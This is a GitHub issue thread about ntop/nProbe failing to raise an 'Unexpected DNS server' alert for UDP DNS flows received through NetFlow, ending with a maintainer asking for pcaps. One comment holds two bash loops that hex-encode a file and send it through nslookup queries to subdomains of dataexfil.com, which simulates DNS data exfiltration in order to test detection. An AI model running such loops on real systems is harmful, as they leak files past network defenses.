nProbe icon indicating copy to clipboard operation
nProbe copied to clipboard

Published 20 hours ago verified publisher icon ntop

Unexpected DNS server alert

Open Cyberfrenk opened this issue 1 year ago • 3 comments

Hello Team, I'm trying to trigger the "Unexpercted DNS server" alert in my environment, but it's working only when DNS requests are based on TCP, when DNSnrequest are UDP based protocol is not recognised and the destination port is marked as "unknown". Here is my environment, the "netflow-server1" is the ntop/nprobe server, the virtual cisco router in the middle is sending netflow record to it:

networkTopology

Here is the result of the DNS UDP flow: ntopFlowUDP

Here is the result of the DNS TCP flow: ntopFlowTCP

I'm attaching here the pcap (dnsRequestsUDP.pcapng) with the DNS requests based on UDP (no alert triggered), the pcap (dnsRequestsTCP.pcapng) with the DNS requests based on TCP (alert triggered) and the netflow capture that goes from the cisco router to the netflow server (UDP and TCP) (netflowUDP.pcapng and netflowTCP.pcapng) Kindly help me to understand what is missing on the netflow record that "summarized" the DNS requests, the ip protocol 17 (UDP) and the destination port 53 are present.

*A sample CFLOW packet that contain the UDP DNS request based is the 7 (netflowUDP.pcapng) **A sample CFLOW packet that contain the TCP DNS request based is the 73 (netflowTCP.pcapng)

netflowRecordUDP netflowRecordTCP

Grazie Davide

Cyberfrenk avatar Dec 17 '23 22:12 Cyberfrenk

Hi Team, Here are the steps to rimulate my scenario:

  • Create a "confidentialFile.txt" file enough longer
  • Convert its content in hex data with the below command (needed the xxd packet) xxd -p -c48 confidentialFile.txt > hex.txt
  • Launch the below script, the 1st send data through UDP (no alarm trigger), the 2nd through TCP (alarm trigger) With this test I'm trying to trigger the "unexpecter DNS server" alert only
#!/bin/bash
for (( i=1 ; i<=236 ; i+=1 )) ; do
  line=$(sed -n $i'p' hex.txt)
  echo $line
  echo nslookup $line.dataexfil.com 10.0.20.10
  nslookup $line.dataexfil.com 10.0.20.10
done


#!/bin/bash
for (( i=1 ; i<=236 ; i+=1 )) ; do
  line=$(sed -n $i'p' hex.txt)
  echo $line
  echo nslookup $line.dataexfil.com 10.0.20.10
  nslookup -vc $line.dataexfil.com 10.0.20.10
done

Here is the NTOP configuration: unexpectedDnsServerConfig

Since we're asking resolution to the server 10.0.20.10 instead of 1.1.1.1 or 8.8.8.8, we'd expect to have the menthioned alert

*The above scenario has the purpose to simulte a DNS data exfiltration, I've tried to simulate it with the ntop/nrpobe server inline and it detect the "Unexpected DNS server" and also the "Suspicious DNS traffic"

Thanks in advance Davide

Cyberfrenk avatar Dec 18 '23 21:12 Cyberfrenk

Hi @Cyberfrenk,

Could you please send me the dnsRequestsUDP.pcapng and the dnsRequestsTCP.pcapng files to [email protected]?

NicoMaio avatar Jan 30 '24 13:01 NicoMaio

Hi @NicoMaio, pcapng files sent!

Thank you

Cyberfrenk avatar Jan 30 '24 21:01 Cyberfrenk